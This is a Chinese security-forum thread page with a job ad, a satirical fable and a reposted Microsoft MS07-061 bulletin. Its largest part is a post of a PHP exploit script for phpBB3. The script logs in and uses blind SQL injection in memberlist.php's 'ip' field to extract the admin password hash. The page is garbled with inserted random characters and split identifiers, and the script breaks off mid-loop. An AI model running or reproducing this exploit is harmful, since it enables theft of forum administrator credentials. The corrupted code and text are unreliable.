最近看过此主题的会员

返回列表 发帖

[人才招聘] [招聘] 绿盟科技(杭州办事处)招聘WEB安全测试/安全研究工程师

  • 招聘职位: 网络安全测试工程师
  • 公司名称: 绿盟科技
  • 工作地点: 江苏
  • 专业要求: 其他 
  • 学历要求: 文盲
  • 工作经验: 2年以上
  • 职位薪金: 面议
  • 年龄要求: 不限
  • 性别要求: 不限 
  • 公司网址: http://www.nsfocus.com
  • 简历邮箱: wangtuo@nsfocus.com
  • 联系电话: 114
  • 在线QQ: 10000
  • 安全助手: 通过非安全中国管理人员招聘/求职,QQ群:57116771


  • ++++++++++绿盟科技相关说明++++++++++

    招聘职位:WEB安全测试/安全研究攻城师
    + o, U- n3 h" [0 x+ U+ o. g人数:4人
    2 i' d& U! H" l, x工作地点:杭州
    : u5 ^- q9 S6 F9 j- ~2 P截止日期:2012年8月30日
      g& h6 _: G5 S0 p学历要求:本科或以上均可
    * @7 P" C  G- Q# z+ c% \# ?岗位要求:+ H8 E' C9 I0 L, j7 i
    1. 熟悉ASP/.NET/java/php等常见web代码;& L3 B( u3 g' y$ ~7 C
    2. 精通或熟悉掌握php/perl/python/javascript/shell等一种或多种脚本语言;
    . W& A1 R5 R4 `% A" Z3. 熟悉主流的Web安全技术,包括SQL注入,XSS,CSRF等安全风险;) `: t/ h6 a9 Y+ L' J
    4. 熟悉国内外主流WEB安全产品、工具,如:APPScan、Inspect、wvs等Web扫描工具;" ^2 ^4 ~7 h$ p9 k0 ^% q: L
    5. 2年以上web安全工作经验,对web安全测试有自己的理解;
    * s, B5 u0 n; i9 ?! E6. 熟悉常见攻击和防御办法,熟悉web安全和渗透技术,能自行进行web渗透测试,WEB代码漏洞挖掘和分析。
    0 Y; J! d( T2 z4 E# U% W具备以下相关条件者将优先考虑:
    $ E0 l( a, K! j. h+ k1.熟悉涉密信息系统以及相关技术要求;4 A4 X2 }( h  R6 S' {
    2.熟悉防病毒、防火墙、VPN、入侵检测、漏洞扫描等信息安全系统工作原理及主流产品;- C; z' r7 w* E
    3.熟练使用Linux操作系统,了解内核安全机制;
    " Q4 i: E, o  D4.有内网渗透经验,擅于独立挖掘web安全漏洞;
    $ q% `4 O8 ], V+ T/ A9 J5.对等级保护标准、评估流程等非常熟悉的优先;
    9 w2 S% y" w. K0 \/ V' r% R6.对cisco、ids、ips等有一定 研究;
    + t* I# J) R, U0 P$ {! j7.一年以上信息安全工作经验;/ `/ R. A" R: Z, j+ q' R
    8.具有网络、系统安全方面证书。
    4 p6 E# w% G" M( N9.有一定的软件编程经验和逆向分析经验优先;5 R: i& m( n7 o" m' A
    有兴趣请发简历到wangtuo@nsfocus.com
    非安全中国网免责声明 1、本帖所有言论和图片纯属发表者个人意见,与本站立场无关;
    2、本话题由:webmaster发表,本帖发表者webmaster符合《关于版权及免责声明》6大管理制度规定,享有相关权利;
    3、其他单位或个人使用、转载或引用本帖时必须征得发表者webmaster和本站的同意;
    4、本帖作品部分转载自其它媒体并在本站发布,转载的目的在于传递更多信息,并不代表本站赞同其观点和对其真实性负责;
    5、本帖如有侵犯到贵站或个人版权问题,请立即告知本站,本站将及时予与删除,并致以最深的歉意;
    6、本站管理员和版主有权不事先通知发帖者而删除本文。

    河蟹、蜘蛛和蜗牛的故事
      河蟹:你这网备案了吗?  蜘蛛:啥,我织个网还要备案啊?  河蟹:当然要备案了,将来要是出个啥事,也能查到这是谁的网啊!  蜘蛛:……  河蟹:赶紧停下去备案,没有备案你的网就不能织,织好我也得给你剪断。  河蟹晃了晃他的两个大钳子,蜘蛛慌了神,赶紧屁颠屁颠跑去备案。蜘蛛还是第一次去这个部门,他发现该部门是一群蜗牛在负责。  好多天过去了,蜘蛛的备案还没拿到,去蜗牛那里问了好几次,都说正在处理。蜘蛛太饿了,于是偷偷织好了自己的网。  有一天早上起来,蜘蛛伸了个懒腰,去吃早餐,结果发现自己的网不见了。邻居们告诉他,河蟹二话不说,直接就把网给剪了。  蜘蛛很生气,真想找河蟹去拼命,可是想想河蟹的大钳子,还是作罢了。  好心的草泥马偷偷告诉蜘蛛,墙外边织网是不需要备案的。蜘蛛很高兴,虽然墙很高很高,他还是努力爬了过去。果然,墙外风和日丽,景色无限,重要的是没有可恶的河蟹来烦人。  可是时间长了,蜘蛛又开始有点怀念了,墙里面有些虫子美味又弱智,想起来就流口水。可惜这墙太高了,这些弱智的虫子不知道怎么飞出来。  于是蜘蛛翻过墙回来,果然不出他所料,蜗牛们已经审议通过了他的备案。蜘蛛迅速在老地方织了一张新网,墙内的虫子们真是又傻又美味啊!  有一天中午,蜘蛛突然感觉到他的网剧烈颤动,睁眼一看,一对正在xxoo的苍蝇不小心撞到了网上。蜘蛛已经吃饱了,正好正午骄阳似火烤得受不了,他笑着骂了一声“傻X”,就躲回洞里睡午觉去了。  迷糊中突然听见有人喊,蜘蛛揉着眼出来一看,原来是河蟹。  河蟹在下面指着那一对苍蝇,歇斯底里地朝他嚷:“你看看,你看看!多低俗!多色情!你有没有社会公德心啊?!你这多损害青少年身心健康你知道吗?”  说完,河蟹挥动自己的钳子,把蜘蛛的网剪了个粉碎。  蜘蛛心疼地看着被剪碎的网,心想:“我纳税养着你,你怎么能这么没人性呢。可是他又对河蟹无可奈何,一番思索之后,他和草泥马依依惜别,爬到了墙外。  蜘蛛从此过上了幸福的生活。

    : a0 E1 B* O# e. }. c8 Z( [5 a% V
    人物:樱花浪子 BLOG地址:http://www.hacklu.net/
    1 O, t$ T2 O9 H$ }# G& G% a& L

    " e. w* j3 ?; o9 N8 ?0 ^3 h; H: G1 {! v- v- G0 G, X

    % i, y& w8 g6 I% c( A; N. P8 W* c4 ~+ j3 i; I! \# t. m! D

    & v6 q+ ~& f0 c+ s5 a2 D  a8 B% j+ i1 E

    % V1 g7 Y" i% _7 @: O9 C! r4 p( T

    9 S. }* h. x" S3 x
    4 p+ X7 p. X# o9 D8 ^
    " j, d+ ?' N5 ^3 R: |# u- D! o. a' _6 [

    : _  G/ \$ B% c* A( o2 v+ G* g6 h! q* {+ W

    + f- v6 z) Y  G/ R$ U3 R: Z
    * i* D# ?! W9 i1 e+ n) }1 V9 o& o8 T5 d$ e$ l) z
    . o4 u9 M& c( |. {2 l
    公告:https://www.sitedirsec.com公布最新漏洞,请关注

    TOP

    已经证明:此贴有意思,而且非常有意思~  
    ' y% |6 ?8 ^" ]6 ~5 X" u
    # C+ X4 c( @2 G7 N0 x2 a6 Y" v, r
    1 ]/ f- q1 H! x' U' a& a  M% q( z

    ' w2 i+ A1 X/ g# ?8 b1 p* J4 q, u2 f' E$ A3 ]1 F
    1 b( j6 S8 G( Z; u2 H! E3 H7 w2 V- r

    * Z7 s  S% ^$ s6 u) e* u% e6 Q
    ! f2 O: ^: e, R3 \- g8 A/ `+ B; s% D' i& s  u

    * |( h7 Z- V, S6 ?
    1 b' y( `4 m0 V9 q7 d7 R3 j; R! Z: M2 _- @4 [6 w4 C
    : e* w( h, c  \5 f
    1 _% c6 s! u' I4 E, u6 C
    7 _, i% |/ R! |5 x6 J/ R
    $ G' f8 W" w$ ?* |. u. G

    ; U1 j  L& B) h6 K: I$ {! y' G# s+ }$ ?
    公告:https://www.sitedirsec.com公布最新漏洞,请关注

    TOP

    MS07-061:Windows URI处理中的远程执行代码漏洞
    发布日期: 十一月 13, 2007版本: 1.0
    9 l! K5 i& L3 O" q, Z. T
    摘要
    ; Y3 V, E4 i  ]# t
    此更新可消除一个公开报告的漏洞。 Windows Shell 处理传递给它的特制 URI 的方式中存在一个远程执行代码漏洞。 如果 Windows Shell 没有充分验证这些 URI,则攻击者可能利用此漏洞并执行任意代码。 Microsoft 仅识别了在使用 Internet Explorer 7 的系统上利用此漏洞的方式。但是,Windows XP 和 Windows Server 2003 的所有受支持版本中包括的 Windows 文件 Shell32.dll 中存在该漏洞。
    ) z! e+ S' v# w( u
    建议。 Microsoft 建议用户立即应用此更新。
    $ U: N% y& W$ `7 @4 R6 w
    受影响的软件

    $ d3 J. }5 o5 c
    操作系统 最大安全影响 综合严重程度等级 此更新替代的公告 Windows XP Service Pack 2 远程执行代码 严重 MS06-045 Windows XP Professional x64 Edition 和 Windows XP Professional x64 Edition Service Pack 2 远程执行代码 严重 MS06-045 Windows Server 2003 Service Pack 1 和 Windows Server 2003 Service Pack 2 远程执行代码 严重 MS06-045 Windows Server 2003 x64 Edition 和 Windows 2003 Server x64 Edition Service Pack 2 远程执行代码 严重 MS06-045 Windows Server 2003 SP1(用于基于 Itanium 的系统)以及 Windows Server 2003 SP2(用于基于 Itanium 的系统) 远程执行代码 严重 MS06-045

    & r% ?; _  Z" v. \
    不受影响的软件

    ) f: ^% T: E9 X" L3 ~
    操作系统 Microsoft Windows 2000 Service Pack 4 Windows Vista  Windows Vista x64
    ! V; H: F' J2 {6 \( X% i( m  a( H' g
    微软的安全公告:
      v" |$ t& u+ }& n* Q. `
    http://www.microsoft.com/china/technet/security/bulletin/MS07-061.mspx
    - V9 |, m- l8 t- E
    (以上链接均连到第三方网站)
    ! Q0 ~9 B/ T- |

      D' D) j. ~0 r
    4 ~5 |) w3 j0 a6 w# V! @* ^
    ! ~- r  }" R$ \9 U7 G) q6 @0 u
    2 {: H1 @- M7 T# b8 z1 i2 ~8 A! z1 w' O# _( ^" T% ^/ T5 R
    & ]" a: \1 _& v) \" J
      j8 g9 T/ a( m6 H. o& l4 C
    8 ]7 B* q2 G2 B8 a) ?+ W( O( I6 A, X$ ]
    ( |; U& u- a; Z' c3 e% c, b

    ) n. ^: T# i  s8 x! D+ _9 j, ~$ \2 F. a# {; L
    . Y# M0 q- f8 ^/ O3 y

    ' d1 J6 U* B0 q/ }" M. M, X( q# G; `5 w
    ( b, ~5 N! ?; A( u( c8 }
    & O2 e. s- I& m  Y+ W0 S

      w5 }# `2 j& j. R$ c5 `9 f! F, r, v# \& _9 l/ o' u
    公告:https://www.sitedirsec.com公布最新漏洞,请关注

    TOP

    PHPBB 3.0 0day漏洞放出
    #!/usr/bin/php -q -d short_open_tag=on
    * q7 I* `# F) p: @& B) s<?   y! n9 H1 u9 W, f/ K' [$ e5 L
    echo "PhpBB 3 memberlist.php/'ip' argument SQL injection / admin credentials disclosure+ P9 E) ]$ }: ]. }& W& l
    ";
    + }# a* y' ^& I0 @1 P+ l( k2 vecho "by Hackerz5 hackerz5x@yahoo.com
    * t. m  c% l4 C7 z+ r' l";
    3 f+ W) Y3 o& ]& o2 P! M) I5 M6 wecho "site: http://hackerz5.com
    9 f) Y) ~2 d# T4 V";
    1 L& ]8 z  J& U0 Recho "dork, version specific: "Powered by phpBB * 2002, 2006 phpBB Group"
    5 [! s! A" O: y4 k  a  R
    ! F/ Z- O1 a' X8 p9 V"; 4 K& g# ]) o( Y1 `0 E* z
    /* " W) b+ `5 i8 L) {
    works regardless of php.ini settings
    5 F1 M2 s9 {5 w: I5 Q) w- A" Tyou need a global moderator account with "simple moderator" role
    / _' r  f' o  }' |: n" S*/ + g7 s8 n# G. t" S" d2 w
    if ($argc<5) {
      ]+ z  X+ v1 S3 X$ y- Yecho "Usage: php ".$argv[0]." host path user pass OPTIONS2 f6 A0 J) h$ s6 y
    ";
    + ]0 b, w& H9 e) wecho "host: target server (ip/hostname)2 |7 s8 {( }% O+ S7 n0 H
    ";
    + B, F5 @% q8 g3 x6 Zecho "path: path to phpbb3
    & C9 o. C# a2 G: f: J7 M% b  |* ]"; 8 k% e' u6 \4 E9 W! O3 A+ \8 \
    echo "user/pass: u need a valid user account with global moderator rights+ ?/ \9 n6 c1 Q! n
    "; : \' _: `+ t2 w* R* J8 y
    echo "Options:
    7 a( D+ w" H) U0 L"; $ z* B$ M. B5 `, A) \: K
    echo " -T[prefix] specify a table prefix different from default (phpbb_)% Y( Y8 Y0 O) ?
    "; % f+ C- x- k( e7 t6 X. G- @. U" K7 I3 t
    echo " -p[port]: specify a port other than 80
    - [" i# W) q" Y9 t. h+ f1 G";
    7 ?; B) i2 T9 f" Pecho " -P[ip:port]: specify a proxy
    1 {7 M( e" a' L% Z7 u& z"; 2 l# {0 J4 I- N! ?
    echo " -u[number]: specify a user id other than 2 (admin)- j: h$ `6 N1 x+ ^9 r' \
    "; $ Y- B7 L+ g. n  C$ H
    echo " -x: disclose table prefix through error messages
    4 p4 X) L- J  @0 `# R3 [";
    0 U) a& ^3 k# \6 r5 C# }# A$ u  p2 xecho "Example:; z/ e" l7 D% d' J: B
    "; 4 ?( L) a* _& A' y* \
    echo "php ".$argv[0]." localhost /phpbb3/ rgod suntzu-u-u4 o7 T+ i8 l# N; {% H1 K  ?9 @
    ";
    " k! M7 R! W. }" fecho "php ".$argv[0]." localhost /phpbb3/ rgod suntzu-u-u -TPHPBB_ -u7; D* c$ \& B1 R2 U9 e, F  [5 @
    "; % H' e0 k. ^8 l9 r" w
    die;
    ( \, E2 {# I+ G# i+ B6 h: L6 n/ Z}   Z5 ?/ j/ C) c3 v3 k
    error_reporting(0); # j+ w4 K. Q4 M5 L7 G* @
    ini_set("max_execution_time",0); 5 ~5 b! H+ x# a1 |% `% M5 k
    ini_set("default_socket_timeout",5);
    3 G* O/ u2 T$ ]) r* a/ B2 w5 @. O( {function quick_dump($string)
    6 C9 b2 t2 ~7 E. {: U0 Z9 [# ^- ]{
    + @; X' y, G; [0 g0 K( |3 i  i$result='';$exa='';$cont=0; . [. Y! Q3 y. `0 m; m; e+ b
    for ($i=0; $i<=strlen($string)-1; $i++)
    / H, R6 p) E8 x' {& X1 }{ 2 w3 J" l6 y: g
    if ((ord($string[$i]) <= 32 ) | (ord($string[$i]) > 126 ))
    ) J5 P( Z2 B# o, a% }{$result.=" .";} ! V$ ~& a& ?  r' C& {/ c: `; }
    else : K6 `! F* v' O. s0 I, d' L
    {$result.=" ".$string[$i];} ! c2 a* N. S* U- U5 O0 k7 Z
    if (strlen(dechex(ord($string[$i])))==2) 8 v  k% f1 z; r. R2 S/ E& i
    {$exa.=" ".dechex(ord($string[$i]));}
    5 b0 [8 R6 d- s% F  h- kelse
    # H/ B( F2 ~& x{$exa.=" 0".dechex(ord($string[$i]));} ; f0 z' ~, c: f# H: I  B9 H
    $cont++;if ($cont==15) {$cont=0; $result.="' P% O' @0 v& t7 x" x% ?
    "; $exa.="
    0 E2 P% P3 J, a9 Z' g7 C";}
    $ E3 z0 O+ C, E7 e} ( q  F9 r5 z5 [6 H
    return $exa."! i, I- M+ F  _) p% i: i) ?
    ".$result;
    8 v3 r+ v5 w2 N5 w0 |3 M. ?} 9 I2 j! m* ~0 w# m" U
    $proxy_regex = '(d{1,3}.d{1,3}.d{1,3}.d{1,3}:d{1,5}) ';   d2 F7 `% O4 `5 p8 v# W! y
    function sendpacketii($packet) 3 \% Q- l7 o, _0 E
    {
    9 k. Z# o7 T2 Cglobal $proxy, $host, $port, $html, $proxy_regex; 7 z3 N/ D0 r* R% ?# ^6 l
    if ($proxy=='') { 3 w9 j; a# @+ ]) O/ J8 t4 }
    $ock=fsockopen(gethostbyname($host),$port); ! f  V0 Q3 f8 V0 u" v# |
    if (!$ock) { 7 J, C- G& E/ [8 e! z
    echo 'No response from '.$host.':'.$port; die;
    % s1 i, K. J' k' |}
    , [- h5 P$ P1 m8 I% B}
    ( F" x3 j% w# c# Yelse { # R7 J7 z/ W& K. ~
    $c = preg_match($proxy_regex,$proxy);
    4 s6 T' G0 f' _0 S4 ~' ?if (!$c) { ! C. D- d9 T' a0 N# k1 I. O
    echo 'Not a valid proxy...';die;
    : t( M% x2 j; @, M} 8 i- Y, v1 o3 G# X4 ~* q
    $parts=explode(':',$proxy); + _4 Y' o; ~" B; M
    echo "Connecting to ".$parts[0].":".$parts[1]." proxy...+ n/ ?7 \: `  b9 E) i
    ";
    , G8 ]' N5 `+ o6 L% d& L$ y% ]$ock=fsockopen($parts[0],$parts[1]);
    $ S. a% P' U+ _$ l, [4 A6 S# aif (!$ock) { . i5 W* @* |% f! V( q! D: e
    echo 'No response from proxy...';die;   R2 u% v/ U6 `7 K8 H, K
    }
    9 p" p, |/ {# l+ l} 7 I$ d$ M8 _0 ~" x
    fputs($ock,$packet);
    1 `2 m8 m" D, I) ^# f* Bif ($proxy=='') {
    8 s' J- R0 |8 g2 L6 O$html=''; , N8 f% n: e- `# l, G
    while (!feof($ock)) {
    ; \: b" ~5 ^8 z# ]; D1 y( B$html.=fgets($ock); , L2 }9 a6 F; J9 h/ D2 h
    } , j) g9 r* }) E; ]6 u$ _
    } % a5 J! {) T4 q: x
    else { # N% J: W, t9 C* j
    $html='';
    ! q) j& o7 u9 q$ _while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$h tml))) {
    * w9 T8 D& I7 O$html.=fread($ock,1); 7 B3 e2 c" \' N! C% U1 A
    } - ]/ A' g: D0 L$ B, f/ `
    }
    7 Q2 P0 t2 W0 Gfclose($ock); 5 o# g' L5 P9 F: C2 x, \
    #debug
    7 G1 I4 H2 V' `3 \#echo "9 s2 J7 i- \# P9 Y
    ".$html;
    # e2 a- e- n  D: m, R+ g! {}
    ; p3 Q' D/ T! Y( p& A4 h, |$host=$argv[1];
    , \( u: [' q$ L! k7 @5 B$path=$argv[2]; + I5 t) v0 Z+ l. V
    $user=$argv[3];
    " B( e7 m; E$ F, ~$pass=$argv[4]; 6 p- n7 d. Q! @+ g1 o
    $port=80;
    $ q* E$ A/ T% w2 W1 f  |+ |  ~  d7 z$prefix="PHPBB_"; 1 J% T/ c+ l/ ?" z0 ~
    $user_id="2";//admin
    7 I$ Q! h, i+ _6 g) h$discl=0;
    " L. P( E; ~, h5 ~) w( M; r$proxy="";
    5 P$ x* c7 o, ]. {3 Jfor ($i=3; $i<=$argc-1; $i++){ . t6 }* g, Z: O- N" l
    $temp=$argv[$i][0].$argv[$i][1];
    0 L1 p& f: z. ~) g1 a7 \if ($temp=="-p")
    1 }. C  j3 u, v: E) e{ 8 W+ k% v' l% o" Q/ e2 o
    $port=str_replace("-p","",$argv[$i]); ) ~' K$ z/ k6 H% i1 y* X
    } 6 W& G( j5 W& W: c4 F6 O6 k
    if ($temp=="-P")
    " B5 v" w0 q* h& m, @{ 1 f8 u( C4 [+ F8 O) o9 H! P2 k3 k
    $proxy=str_replace("-P","",$argv[$i]); 8 A0 K& V3 w- L( v! Y# v
    } 6 y$ P7 c6 z+ {; n3 B! J& |
    if ($temp=="-T") / L4 g( ?6 w: ?2 t- Q
    {
    + g* F  |2 t+ a& ^; [5 p$prefix=str_replace("-T","",$argv[$i]); . J3 Y% A. p! D* G. S
    } & s: x- h0 C  t
    if ($temp=="-u")
    ( o; u+ j" Z. F0 j$ K, s* g( r{ * U8 A4 z' W) j
    $user_id=str_replace("-u","",$argv[$i]);
    & a* a; z4 B# `  w$ d( t8 Z' W}
    1 R% R. [& ^! K& e( q) ]if ($temp=="-x") + x: ^5 C0 _1 N% F2 e# w2 Y0 |  X
    {
    , O) F; i* \6 Z. M+ H/ @7 N$discl=1;
    0 r) v7 ^2 B) ~4 H} 6 d5 C" k4 E2 A; ?
    }
    3 _( n' {! t6 C$ t0 t( Rif (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... check the path!'; die;} . S/ `7 y- Z: j5 b* J
    if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;}
    2 u6 l. M/ v- q$data="username=".urlencode($user);
    , b2 `* L2 `. k- \/ q7 E$data.="&amp;password=".urlencode($pass); 4 G5 O3 A3 O% O" t
    $data.="&amp;redirect=index.php";
    0 M5 L- N! C' e8 r  B& J, C) r$data.="&amp;login=Login"; ) E  `8 Z8 c) X1 `. \( H  S
    $packet="POST ".$p."ucp.php?mode=login HTTP/1.0
    + |" H4 A  E0 K5 b! d"; 7 Q8 l, F. e+ E
    $packet.="Referer: http://$host$path/ucp.php?mode=login8 B& o' I6 @& @4 Z3 i3 O
    ";
    1 r! Y) ]4 X+ g) Q) x0 F$packet.="Content-Type: application/x-www-form-urlencoded
    " P) }! P3 W7 W, O";
    ! X- Y; P+ E/ U. C( Y* t& Q2 K9 v$packet.="Accept-Encoding: text/plain
    6 ]( E( W& Z/ R/ l"; $ l6 F7 z! b7 D* n6 W- W6 M
    $packet.="Host: ".$host."1 Y) M$ _- r4 `4 ^9 H+ h
    ";
    - u& D8 ]2 @  T8 Z$packet.="Content-Length: ".strlen($data)."
    . X; N+ ?  G# I! C; j";
    ! S9 a7 y; Q+ e. _$packet.="Connection: Close2 v( y: G' a( k) P1 N

    ! P, P! W7 o$ ^";
    ' S  L! P3 j; B: J; @% N5 X( D" y* s$packet.=$data; 0 l3 w6 x7 W+ }, Q
    sendpacketii($packet); + ]3 ?, F5 a; Y. p7 s4 a8 x( [
    $cookie="";
    5 f- O# q8 o: q+ f" p$temp=explode("Set-Cookie: ",$html); : O  w, X* M9 p# C% i9 \5 ]
    for ($i=1; $i<=count($temp)-1; $i++) . W5 j+ V# s: Q8 e) Y. H
    {
      W5 v. n7 [1 E2 L0 Q+ O$temp2=explode(" ",$temp[$i]);
    6 w4 }2 P7 e7 q! B) g! y4 m& x( `$cookie.=" ".$temp2[0]; , @/ u2 V- [, ]+ x8 s
    } ( G$ \& f' b  F) Q% ^
    if (eregi("_u=1;",$cookie)) ! i2 a- s( T3 A. P0 W. Y
    {
      n8 r  Q; k& a" J//echo $html."
    3 T- V0 A, k! q. I! S/ V$ @5 `3 T";//debug 1 N+ T- o% k- ]' u4 M
    //die("Unable to login..."); 8 s/ s9 K8 @# Z+ f- ?3 a
    } 1 i7 V" Q7 l& k" H3 L6 s
    echo "cookie -> ".$cookie.". F/ Y3 q  x# N# P
    "; - \+ ~. L8 B! Z. O- M5 T: f' J$ k
    if ($discl) 8 z# p& @4 Q- V0 X6 a  b8 u& W
    {
    3 R& x4 L5 N* M( n$sql="'suntzuuuuu"; # H- S3 p. g% C/ x7 D
    echo "sql -> ".$sql."4 g2 q2 Q* _- T# k4 o# n. i8 U
    "; . V. H- U% e. |1 u& K
    $sql=urlencode(strtoupper($sql));
    9 q9 @4 L& A: o6 S8 S$data="username="; ) W  J/ S% i! @% S& Y# M: v; _$ h
    $data.="&amp;icq="; . v" t& m+ k5 a
    $data.="&amp;email=";
    - c, {& X( E  R/ \2 d% K5 N: p$data.="&amp;aim=";
    * j' h3 i3 G6 m  c  V8 y/ v1 e0 S$data.="&amp;joined_select=lt";
    & ^7 i) C3 C" _6 Q' L$data.="&amp;joined="; ' ]9 m$ z/ K% N% O* Q' |
    $data.="&amp;yahoo="; ! W( g8 _: [+ z
    $data.="&amp;active_select=lt"; : W  s' c: N, y5 z! t  @5 f" M* F4 u' f/ e
    $data.="&amp;active=";
    6 c, x* M$ S$ J2 s# L: g4 Q& K$data.="&amp;msn=";
    # W  q3 K2 G3 X% D( Y: F3 i$data.="&amp;count_select=eq";
      l+ o6 e7 }/ i/ A3 c+ U$data.="&amp;count=";
    : a8 b; R) j2 z5 j2 `. W- B$data.="&amp;jabber=";
    , a2 }3 ?, v/ f6 w$data.="&amp;sk=c";
    : K2 L0 A. R% c6 @# a% ~$data.="&amp;sd=a";
    . @- W( Z/ a6 v* P! u! S. c$data.="&amp;ip=".$sql; 4 g5 _2 G) @+ ?, i+ a$ P
    $data.="&amp;search_group_id=0"; 8 r" Y' \1 S# m# Z3 G
    $data.="&amp;submit=Search";
    8 ?7 k% ~0 G" E+ ]8 p$packet="POST ".$p."memberlist.php?joined_select=lt&amp;active_selec t=lt&amp;count_select=eq&amp;sk=c&amp;sd=a&amp;ip=%5C%27&amp;form=post &amp;field=username_list&amp;mode=searchuser&amp;form=post HTTP/1.02 t0 W: M/ k8 ~) s( w6 @( z9 Y% C
    "; " M* q1 Y% s! k9 n+ R- p; i
    $packet.="Content-Type: application/x-www-form-urlencoded
    3 c) W, j7 Y6 I5 A";
    0 Z8 F& G) V! Z0 b$packet.="Host: ".$host."' I! x5 h6 i/ c' e" k
    ";
    ' q+ `2 S! Q6 T3 r1 S# n) {1 i$packet.="Content-Length: ".strlen($data)."
    2 Y9 ~0 H$ u+ ?5 t' B7 _";
    % @4 M, B" P) f3 |+ c- R3 M# r, @* @$packet.="Connection: Close4 E5 d" I& L* X. q3 u7 }# Q) \
    "; 0 t$ I7 P! I% ?% a1 p0 A
    $packet.="Cookie: ".$cookie." 7 e) Y& w* \7 i

    $ T/ w3 i4 ~7 @  ^";
    2 F& ?. i0 s1 A( l) I% N$packet.=$data;
    / K8 b1 t4 W1 A, c4 e# p. f- vsendpacketii($packet); , ~, V: u7 |# s8 G% m" ^! L
    if (strstr($html,"You have an error in your SQL syntax")) 3 a$ H. |2 _; x
    { 9 z5 |! E2 H( ?  _! |
    $temp=explode("posts",$html);
    + e, N* @2 ?2 @; @! R$temp2=explode(" ",$temp[0]);
    0 H9 L0 w# p4 e$ }. Y$prefix=strtoupper($temp2[count($temp2)-1]);
    ! D( c- S! @. xecho "prefix -> ".$prefix."
    * f9 L+ t& Y0 r: [7 A";sleep(2);
    # e. [% g" |& ]  m, ^9 L}
      R& H# ]% r7 l6 t" ?, D  T}
    ! j& M5 d7 O  @+ U$md5s[0]=0;//null
    - D6 {* B+ M; U5 d# i7 C# R$md5s=array_merge($md5s,range(48,57)); //numbers
    4 h- A+ v4 |* ~5 C% r; I$md5s=array_merge($md5s,range(97,102));//a-f letters - u, N" F' A* a3 |5 Z' [7 R$ E
    //print_r(array_values($md5s));
    % O, U7 {) q0 e) \/ @2 k" j2 h$j=1;$password="";
    ! S+ Z8 M) e1 @) Y, |6 R" Gwhile (!strstr($password,chr(0)))
    * }  r. K$ b# m( |, g3 z, w" y  x+ k4 r{
    2 i7 n8 @2 g* L1 yfor ($i=0; $i<=255; $i++) & Y; V  y, m/ v( a7 o' k
    {
    ( C0 f" c# x. T9 Y0 {) }7 vif (in_array($i,$md5s)) - r" E" K6 U3 d# ]9 k& [
    {
    6 P* S: [3 b3 X& e; F$sql="1.1.1.999') UNION SELECT IF ((ASCII(SUBSTRING(USER_PASSWORD,".$j.",1))=$i),$us er_id,-1) FROM ".$prefix."USERS WHERE USER_ID=$user_id UNION SELECT POSTER_ID FROM ".$prefix."POSTS WHERE POSTER_IP IN ('1.1.1.999";
    5 }7 g  y4 V4 k& aecho "sql -> ".$sql."" G% i6 F: |8 g* ]% @  |% |
    "; 5 P4 N! S0 u' m' ^& F+ I$ T  C
    $sql=urlencode(strtoupper($sql)); ( I! F" c3 T' _  }
    $data="username="; 3 o, V) f- x5 G3 P& w$ Y! e- y8 k
    $data.="&amp;icq=";
    * ~3 D0 X! }: Q4 H. M/ o$data.="&amp;email="; 2 L4 ~7 b5 T+ m  a* `
    $data.="&amp;aim="; : Z" U6 G  M& L1 s9 Y; W
    $data.="&amp;joined_select=lt"; / _4 u2 @* \0 ?" Q
    $data.="&amp;joined=";
    1 a" d% G1 Z7 l; p: f) @: ^2 J0 V$data.="&amp;yahoo="; ' ^1 n) w5 l) e0 [  A" D
    $data.="&amp;active_select=lt";
    0 c8 h8 D- p+ t  R- Y1 @! ?$data.="&amp;active="; + S# h: ^9 V4 J2 c( |# `
    $data.="&amp;msn="; 9 Q2 l- @! I/ E
    $data.="&amp;count_select=eq";
    1 m5 d) {6 Q/ m$data.="&amp;count="; 0 m- G0 D; R+ H% t( h+ ^" G2 s. |4 _
    $data.="&amp;jabber=";
    8 N" f3 c7 \& D$ s$data.="&amp;sk=c";
    $ J1 i7 E, h: v& q( ?. u$data.="&amp;sd=a";
    0 u( C0 D' J$ y3 ^' X$ r$data.="&amp;ip=".$sql;
    4 k5 k8 f( I' M/ o! C, [$data.="&amp;search_group_id=0";
    # O6 n/ `- B3 m' v( v( O$data.="&amp;submit=Search";
    , e  m7 C) {6 @7 ^$packet="POST ".$p."memberlist.php?joined_select=lt&amp;active_selec t=lt&amp;count_select=eq&amp;sk=c&amp;sd=a&amp;ip=%5C%27&amp;form=post &amp;field=username_list&amp;mode=searchuser&amp;form=post HTTP/1.0
    # Q$ x8 }# `, B$ F";
    6 N; Q) [" k/ T( P% o7 E$packet.="Content-Type: application/x-www-form-urlencoded
    ( v, ]' ^* y9 C* j";
    , r4 o0 l! g" C0 X/ N9 v$packet.="Host: ".$host."
    ) o+ Q; U9 v: _( A& g' B"; 4 u5 s* d, E; b  C3 U
    $packet.="Content-Length: ".strlen($data)."" Z! d( k; U0 A6 k' I
    ";
    8 _7 R0 a  |3 @+ Q$packet.="Connection: Close  M$ T3 Y9 L: h- l4 y5 s
    ";
    $ Z  J$ }% S& i' v' C; j6 \) j) z- f, Y9 [$packet.="Cookie: ".$cookie."
    - h6 Q1 r, D: j. {$ O2 x
    5 Z& Q1 n) W- |; n3 ~";
    4 `, d, H! L, H; q$packet.=$data; $ ~* ]; Y/ U, W. A% o
    sendpacketii($packet); ) H! O* M% M' e& N8 Z2 M
    if (!strstr($html,"No members found for this search criteria")) {$password.=chr($i);echo "password -> ".$password."[???], _' k7 c  Y4 U9 l. k
    ";sleep(2);break;}
    ' l5 ^; k9 ~: n) A% l6 w}
    2 c. p8 C0 S7 z. n; `+ {if ($i==255) {die("Exploit failed...");}
    3 n, E- Q' w3 z* o3 s} " K. t& {0 i6 S* D+ ^
    $j++;
    ) p9 e5 K6 b; x) A* l4 D} 5 r# f" J8 o1 S: h4 u! n: l
    $j=1;$admin=""; - N6 a% C* ]' v. n/ a
    while (!strstr($admin,chr(0))) 4 N! x$ g" y5 `' ^, Q- S
    { 3 p) O2 D7 \0 E/ f  S" E; b
    for ($i=0; $i<=255; $i++) 7 [5 W3 ^( D( J& ~8 m4 ~0 j; N
    {
